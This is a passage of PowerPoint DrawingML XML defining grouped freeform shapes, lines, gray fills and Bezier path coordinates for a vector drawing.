                        <a:gd name="T9" fmla="*/ 415 h 41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" h="415">
                          <a:moveTo>
                            <a:pt x="0" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="68" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="68" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D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1" name="Freeform 547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2338" y="3066"/>
                      <a:ext cx="34" cy="204"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 69 w 69"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 3 w 69"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 0 w 69"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 69 w 69"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 69 w 69"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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9" h="415">
                          <a:moveTo>
                            <a:pt x="69" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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60" name="Group 548"/>
                  <p:cNvGrpSpPr>
                    <a:grpSpLocks noChangeAspect="1"/>
                  </p:cNvGrpSpPr>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr bwMode="auto">
                  <a:xfrm flipH="1">
                    <a:off x="855" y="3113"/>
                    <a:ext cx="68" cy="204"/>
                    <a:chOff x="2953" y="3232"/>
                    <a:chExt cx="68" cy="204"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="278" name="Freeform 549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2987" y="3232"/>
                      <a:ext cx="34" cy="204"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 68"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 68 w 68"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 68 w 68"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 0 w 68"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 0 w 68"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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8" h="415">
                          <a:moveTo>
                            <a:pt x="0" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="68" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="68" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D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9" name="Freeform 55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2953" y="3232"/>
                      <a:ext cx="34" cy="204"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 69 w 69"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 3 w 69"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 0 w 69"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 69 w 69"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 69 w 69"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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9" h="415">
                          <a:moveTo>
                            <a:pt x="69" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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61" name="Group 551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854" y="2913"/>
                    <a:ext cx="1087" cy="346"/>
                    <a:chOff x="-181" y="3580"/>
                    <a:chExt cx="2284" cy="730"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="262" name="Freeform 55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714" y="3819"/>
                      <a:ext cx="1389" cy="491"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 582 w 588"/>
                        <a:gd name="T1" fmla="*/ 4 h 208"/>
                        <a:gd name="T2" fmla="*/ 568 w 588"/>
                        <a:gd name="T3" fmla="*/ 1 h 208"/>
                        <a:gd name="T4" fmla="*/ 558 w 588"/>
                        <a:gd name="T5" fmla="*/ 3 h 208"/>
                        <a:gd name="T6" fmla="*/ 37 w 588"/>
                        <a:gd name="T7" fmla="*/ 143 h 208"/>
                        <a:gd name="T8" fmla="*/ 27 w 588"/>
                        <a:gd name="T9" fmla="*/ 146 h 208"/>
                        <a:gd name="T10" fmla="*/ 9 w 588"/>
                        <a:gd name="T11" fmla="*/ 161 h 208"/>
                        <a:gd name="T12" fmla="*/ 0 w 588"/>
                        <a:gd name="T13" fmla="*/ 179 h 208"/>
                        <a:gd name="T14" fmla="*/ 0 w 588"/>
                        <a:gd name="T15" fmla="*/ 194 h 208"/>
                        <a:gd name="T16" fmla="*/ 7 w 588"/>
                        <a:gd name="T17" fmla="*/ 204 h 208"/>
                        <a:gd name="T18" fmla="*/ 19 w 588"/>
                        <a:gd name="T19" fmla="*/ 208 h 208"/>
                        <a:gd name="T20" fmla="*/ 31 w 588"/>
                        <a:gd name="T21" fmla="*/ 204 h 208"/>
                        <a:gd name="T22" fmla="*/ 550 w 588"/>
                        <a:gd name="T23" fmla="*/ 65 h 208"/>
                        <a:gd name="T24" fmla="*/ 562 w 588"/>
                        <a:gd name="T25" fmla="*/ 62 h 208"/>
                        <a:gd name="T26" fmla="*/ 579 w 588"/>
                        <a:gd name="T27" fmla="*/ 48 h 208"/>
                        <a:gd name="T28" fmla="*/ 588 w 588"/>
                        <a:gd name="T29" fmla="*/ 30 h 208"/>
                        <a:gd name="T30" fmla="*/ 588 w 588"/>
                        <a:gd name="T31" fmla="*/ 14 h 208"/>
                        <a:gd name="T32" fmla="*/ 582 w 588"/>
                        <a:gd name="T33" fmla="*/ 4 h 20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588" h="208">
                          <a:moveTo>
                            <a:pt x="582" y="4"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="578" y="1"/>
                            <a:pt x="573" y="0"/>
                            <a:pt x="568" y="1"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="558" y="3"/>
                            <a:pt x="558" y="3"/>
                            <a:pt x="558" y="3"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="37" y="143"/>
                            <a:pt x="37" y="143"/>
                            <a:pt x="37" y="143"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="27" y="146"/>
                            <a:pt x="27" y="146"/>
                            <a:pt x="27" y="146"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="21" y="149"/>
                            <a:pt x="14" y="154"/>
                            <a:pt x="9" y="161"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="4" y="167"/>
                            <a:pt x="2" y="173"/>
                            <a:pt x="0" y="179"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="194"/>
                            <a:pt x="0" y="194"/>
                            <a:pt x="0" y="194"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="198"/>
                            <a:pt x="3" y="202"/>
                            <a:pt x="7" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="10" y="207"/>
                            <a:pt x="15" y="208"/>
                            <a:pt x="19" y="208"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="31" y="204"/>
                            <a:pt x="31" y="204"/>
                            <a:pt x="31" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="550" y="65"/>
                            <a:pt x="550" y="65"/>
                            <a:pt x="550" y="65"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="562" y="62"/>
                            <a:pt x="562" y="62"/>
                            <a:pt x="562" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="568" y="59"/>
                            <a:pt x="574" y="54"/>
                            <a:pt x="579" y="48"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="584" y="42"/>
                            <a:pt x="587" y="36"/>
                            <a:pt x="588" y="30"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="588" y="14"/>
                            <a:pt x="588" y="14"/>
                            <a:pt x="588" y="14"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="587" y="10"/>
                            <a:pt x="585" y="7"/>
                            <a:pt x="582" y="4"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="80808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6350" cap="flat" cmpd="sng">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:miter lim="800000"/>
                          <a:headEnd type="none" w="med" len="med"/>
                          <a:tailEnd type="none" w="med" len="med"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3" name="Freeform 553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714" y="4156"/>
                      <a:ext cx="144" cy="154"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 48 w 61"/>
                        <a:gd name="T1" fmla="*/ 47 h 65"/>
                        <a:gd name="T2" fmla="*/ 50 w 61"/>
                        <a:gd name="T3" fmla="*/ 4 h 65"/>
                        <a:gd name="T4" fmla="*/ 37 w 61"/>
                        <a:gd name="T5" fmla="*/ 0 h 65"/>
                        <a:gd name="T6" fmla="*/ 27 w 61"/>
                        <a:gd name="T7" fmla="*/ 3 h 65"/>
                        <a:gd name="T8" fmla="*/ 9 w 61"/>
                        <a:gd name="T9" fmla="*/ 18 h 65"/>
                        <a:gd name="T10" fmla="*/ 0 w 61"/>
                        <a:gd name="T11" fmla="*/ 36 h 65"/>
                        <a:gd name="T12" fmla="*/ 0 w 61"/>
                        <a:gd name="T13" fmla="*/ 51 h 65"/>
                        <a:gd name="T14" fmla="*/ 7 w 61"/>
                        <a:gd name="T15" fmla="*/ 61 h 65"/>
                        <a:gd name="T16" fmla="*/ 19 w 61"/>
                        <a:gd name="T17" fmla="*/ 65 h 65"/>
                        <a:gd name="T18" fmla="*/ 31 w 61"/>
                        <a:gd name="T19" fmla="*/ 61 h 65"/>
                        <a:gd name="T20" fmla="*/ 48 w 61"/>
                        <a:gd name="T21" fmla="*/ 47 h 6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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="61" h="65">
                          <a:moveTo>
                            <a:pt x="48" y="47"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="60" y="31"/>
                            <a:pt x="61" y="12"/>
                            <a:pt x="50" y="4"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="47" y="1"/>
                            <a:pt x="42" y="0"/>
                            <a:pt x="37" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="27" y="3"/>
                            <a:pt x="27" y="3"/>
                            <a:pt x="27" y="3"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="21" y="6"/>
                            <a:pt x="14" y="11"/>
                            <a:pt x="9" y="18"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="4" y="24"/>
                            <a:pt x="2" y="30"/>
                            <a:pt x="0" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="51"/>
                            <a:pt x="0" y="51"/>
                            <a:pt x="0" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="55"/>
                            <a:pt x="3" y="59"/>
                            <a:pt x="7" y="61"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="10" y="64"/>
                            <a:pt x="15" y="65"/>
                            <a:pt x="19" y="65"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="31" y="61"/>
                            <a:pt x="31" y="61"/>
                            <a:pt x="31" y="61"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="37" y="58"/>
                            <a:pt x="43" y="54"/>
                            <a:pt x="48" y="47"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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4" name="Freeform 55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959" y="3819"/>
                      <a:ext cx="144" cy="153"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 13 w 61"/>
                        <a:gd name="T1" fmla="*/ 18 h 65"/>
                        <a:gd name="T2" fmla="*/ 11 w 61"/>
                        <a:gd name="T3" fmla="*/ 62 h 65"/>
                        <a:gd name="T4" fmla="*/ 23 w 61"/>
                        <a:gd name="T5" fmla="*/ 65 h 65"/>
                        <a:gd name="T6" fmla="*/ 35 w 61"/>
                        <a:gd name="T7" fmla="*/ 62 h 65"/>
                        <a:gd name="T8" fmla="*/ 52 w 61"/>
                        <a:gd name="T9" fmla="*/ 48 h 65"/>
                        <a:gd name="T10" fmla="*/ 61 w 61"/>
                        <a:gd name="T11" fmla="*/ 30 h 65"/>
                        <a:gd name="T12" fmla="*/ 61 w 61"/>
                        <a:gd name="T13" fmla="*/ 14 h 65"/>
                        <a:gd name="T14" fmla="*/ 55 w 61"/>
                        <a:gd name="T15" fmla="*/ 4 h 65"/>
                        <a:gd name="T16" fmla="*/ 41 w 61"/>
                        <a:gd name="T17" fmla="*/ 1 h 65"/>
                        <a:gd name="T18" fmla="*/ 31 w 61"/>
                        <a:gd name="T19" fmla="*/ 3 h 65"/>
                        <a:gd name="T20" fmla="*/ 13 w 61"/>
                        <a:gd name="T21" fmla="*/ 18 h 6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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="61" h="65">
                          <a:moveTo>
                            <a:pt x="13" y="18"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="34"/>
                            <a:pt x="0" y="53"/>
                            <a:pt x="11" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="15" y="64"/>
                            <a:pt x="19" y="65"/>
                            <a:pt x="23" y="65"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="35" y="62"/>
                            <a:pt x="35" y="62"/>
                            <a:pt x="35" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="41" y="59"/>
                            <a:pt x="47" y="54"/>
                            <a:pt x="52" y="48"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="57" y="42"/>
                            <a:pt x="60" y="36"/>
                            <a:pt x="61" y="30"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="61" y="14"/>
                            <a:pt x="61" y="14"/>
                            <a:pt x="61" y="14"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="60" y="10"/>
                            <a:pt x="58" y="7"/>
                            <a:pt x="55" y="4"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="51" y="1"/>
                            <a:pt x="46" y="0"/>
                            <a:pt x="41" y="1"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="31" y="3"/>
                            <a:pt x="31" y="3"/>
                            <a:pt x="31" y="3"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="25" y="6"/>
                            <a:pt x="19" y="11"/>
                            <a:pt x="13" y="18"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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5" name="Freeform 555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406" y="3958"/>
                      <a:ext cx="154" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 11 w 65"/>
                        <a:gd name="T1" fmla="*/ 65 h 73"/>
                        <a:gd name="T2" fmla="*/ 52 w 65"/>
                        <a:gd name="T3" fmla="*/ 51 h 73"/>
                        <a:gd name="T4" fmla="*/ 55 w 65"/>
                        <a:gd name="T5" fmla="*/ 8 h 73"/>
                        <a:gd name="T6" fmla="*/ 13 w 65"/>
                        <a:gd name="T7" fmla="*/ 22 h 73"/>
                        <a:gd name="T8" fmla="*/ 11 w 65"/>
                        <a:gd name="T9" fmla="*/ 65 h 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65" h="73">
                          <a:moveTo>
                            <a:pt x="11" y="65"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="22" y="73"/>
                            <a:pt x="40" y="67"/>
                            <a:pt x="52" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="64" y="36"/>
                            <a:pt x="65" y="16"/>
                            <a:pt x="55" y="8"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="44" y="0"/>
                            <a:pt x="25" y="6"/>
                            <a:pt x="13" y="22"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="38"/>
                            <a:pt x="0" y="57"/>
                            <a:pt x="11" y="65"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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6" name="Freeform 55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-118" y="3580"/>
                      <a:ext cx="2174" cy="584"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 2174"/>
                        <a:gd name="T1" fmla="*/ 343 h 584"/>
                        <a:gd name="T2" fmla="*/ 1278 w 2174"/>
                        <a:gd name="T3" fmla="*/ 0 h 584"/>
                        <a:gd name="T4" fmla="*/ 2174 w 2174"/>
                        <a:gd name="T5" fmla="*/ 241 h 584"/>
                        <a:gd name="T6" fmla="*/ 896 w 2174"/>
                        <a:gd name="T7" fmla="*/ 584 h 584"/>
                        <a:gd name="T8" fmla="*/ 0 w 2174"/>
                        <a:gd name="T9" fmla="*/ 343 h 58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174" h="584">
                          <a:moveTo>
                            <a:pt x="0" y="343"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1278" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2174" y="241"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="896" y="584"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="343"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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7" name="Freeform 557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-181" y="3923"/>
                      <a:ext cx="959" cy="380"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 27 w 406"/>
                        <a:gd name="T1" fmla="*/ 0 h 161"/>
                        <a:gd name="T2" fmla="*/ 27 w 406"/>
                        <a:gd name="T3" fmla="*/ 0 h 161"/>
                        <a:gd name="T4" fmla="*/ 9 w 406"/>
                        <a:gd name="T5" fmla="*/ 15 h 161"/>
                        <a:gd name="T6" fmla="*/ 0 w 406"/>
                        <a:gd name="T7" fmla="*/ 34 h 161"/>
                        <a:gd name="T8" fmla="*/ 0 w 406"/>
                        <a:gd name="T9" fmla="*/ 48 h 161"/>
                        <a:gd name="T10" fmla="*/ 7 w 406"/>
                        <a:gd name="T11" fmla="*/ 58 h 161"/>
                        <a:gd name="T12" fmla="*/ 19 w 406"/>
                        <a:gd name="T13" fmla="*/ 62 h 161"/>
                        <a:gd name="T14" fmla="*/ 387 w 406"/>
                        <a:gd name="T15" fmla="*/ 161 h 161"/>
                        <a:gd name="T16" fmla="*/ 386 w 406"/>
                        <a:gd name="T17" fmla="*/ 160 h 161"/>
                        <a:gd name="T18" fmla="*/ 379 w 406"/>
                        <a:gd name="T19" fmla="*/ 150 h 161"/>
                        <a:gd name="T20" fmla="*/ 379 w 406"/>
                        <a:gd name="T21" fmla="*/ 135 h 161"/>
                        <a:gd name="T22" fmla="*/ 388 w 406"/>
                        <a:gd name="T23" fmla="*/ 117 h 161"/>
                        <a:gd name="T24" fmla="*/ 406 w 406"/>
                        <a:gd name="T25" fmla="*/ 102 h 161"/>
                        <a:gd name="T26" fmla="*/ 27 w 406"/>
                        <a:gd name="T27" fmla="*/ 0 h 16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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="406" h="161">
                          <a:moveTo>
                            <a:pt x="27" y="0"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="27" y="0"/>
                            <a:pt x="27" y="0"/>
                            <a:pt x="27" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="20" y="3"/>
                            <a:pt x="14" y="8"/>
                            <a:pt x="9" y="15"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="4" y="21"/>
                            <a:pt x="1" y="27"/>
                            <a:pt x="0" y="34"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="48"/>
                            <a:pt x="0" y="48"/>
                            <a:pt x="0" y="48"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="52"/>
                            <a:pt x="3" y="56"/>
                            <a:pt x="7" y="58"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="10" y="61"/>
                            <a:pt x="14" y="62"/>
                            <a:pt x="19" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="387" y="161"/>
                            <a:pt x="387" y="161"/>
                            <a:pt x="387" y="161"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="386" y="160"/>
                            <a:pt x="386" y="160"/>
                            <a:pt x="386" y="160"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="382" y="158"/>
                            <a:pt x="380" y="154"/>
                            <a:pt x="379" y="150"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="379" y="135"/>
                            <a:pt x="379" y="135"/>
                            <a:pt x="379" y="135"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="381" y="129"/>
                            <a:pt x="383" y="123"/>
                            <a:pt x="388" y="117"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="393" y="110"/>
                            <a:pt x="400" y="105"/>
                            <a:pt x="406" y="102"/>
                          </a:cubicBezTo>
                          <a:lnTo>
                            <a:pt x="27" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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8" name="Freeform 55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733" y="3693"/>
                      <a:ext cx="897" cy="241"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 897 w 897"/>
                        <a:gd name="T1" fmla="*/ 241 h 241"/>
                        <a:gd name="T2" fmla="*/ 0 w 897"/>
                        <a:gd name="T3" fmla="*/ 0 h 241"/>
                        <a:gd name="T4" fmla="*/ 897 w 897"/>
                        <a:gd name="T5" fmla="*/ 241 h 24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897" h="241">
                          <a:moveTo>
                            <a:pt x="897" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="897" y="24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9" name="Line 559"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="733" y="3693"/>
                      <a:ext cx="897" cy="241"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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0" name="Freeform 56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520" y="3753"/>
                      <a:ext cx="896" cy="238"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 896 w 896"/>
                        <a:gd name="T1" fmla="*/ 238 h 238"/>
                        <a:gd name="T2" fmla="*/ 0 w 896"/>
                        <a:gd name="T3" fmla="*/ 0 h 238"/>
                        <a:gd name="T4" fmla="*/ 896 w 896"/>
                        <a:gd name="T5" fmla="*/ 238 h 23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896" h="238">
                          <a:moveTo>
                            <a:pt x="896" y="238"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="896" y="23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1" name="Line 561"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="520" y="3753"/>
                      <a:ext cx="896" cy="238"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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2" name="Freeform 56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308" y="3809"/>
                      <a:ext cx="895" cy="241"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 895 w 895"/>
                        <a:gd name="T1" fmla="*/ 241 h 241"/>
                        <a:gd name="T2" fmla="*/ 0 w 895"/>
                        <a:gd name="T3" fmla="*/ 0 h 241"/>
                        <a:gd name="T4" fmla="*/ 895 w 895"/>
                        <a:gd name="T5" fmla="*/ 241 h 24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895" h="241">
                          <a:moveTo>
                            <a:pt x="895" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="895" y="24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3" name="Line 563"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="308" y="3809"/>
                      <a:ext cx="895" cy="241"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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4" name="Freeform 56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945" y="3637"/>
                      <a:ext cx="898" cy="241"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 898 w 898"/>
                        <a:gd name="T1" fmla="*/ 241 h 241"/>
                        <a:gd name="T2" fmla="*/ 0 w 898"/>
                        <a:gd name="T3" fmla="*/ 0 h 241"/>
                        <a:gd name="T4" fmla="*/ 898 w 898"/>
